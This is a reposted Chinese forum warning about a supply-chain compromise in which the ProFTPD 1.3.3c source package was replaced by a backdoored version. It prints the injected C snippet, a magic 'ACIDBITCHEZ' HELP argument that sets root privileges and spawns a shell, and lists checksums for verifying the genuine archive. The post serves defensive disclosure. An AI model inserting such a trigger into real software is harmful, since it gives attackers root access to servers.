[转帖] 小心ProFTPD 1.3.3c源码被人插入后门

http://www.exploit-db.com/exploits/15662/ 这里说到，rsync.proftpd.org 服务器存在一个漏洞，被黑客攻击得手，然后修改了官方提供用户下载的proftpd源码包，在代码中加入了后门！ 注意看这里 if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }   /* List the syntax for the given target command. */   for (i = 0; i < help_list->nelts; i++) {   if (strcasecmp(helps[i].cmd, target) == 0) { 复制代码 在hacker指定的特殊指令下，会向攻击者开启一个root权限的shell!! 所以建议大家把自己下载的proftpd安装包与官方的标准文件进行对比，以确保未被加入后门。 Original file: Name: proftpd-1.3.3c.tar.bz2 Size: 4166609 MD5: 8571bd78874b557e98480ed48e2df1d2 SHA256: ea7f02e21f81e6ce79ebde8bbbd334bd269a039ac9137196a35309f791b24db1 Compromised file: Name: proftpd-1.3.3c.tar.bz2 Size: 4203030 MD5: a43df54cc0b16c9e63a1045129d7b144 SHA256: d56d6d643534fe618b26807948b3cfe43c02b3f7abf7f4a073778c9c1666d1eb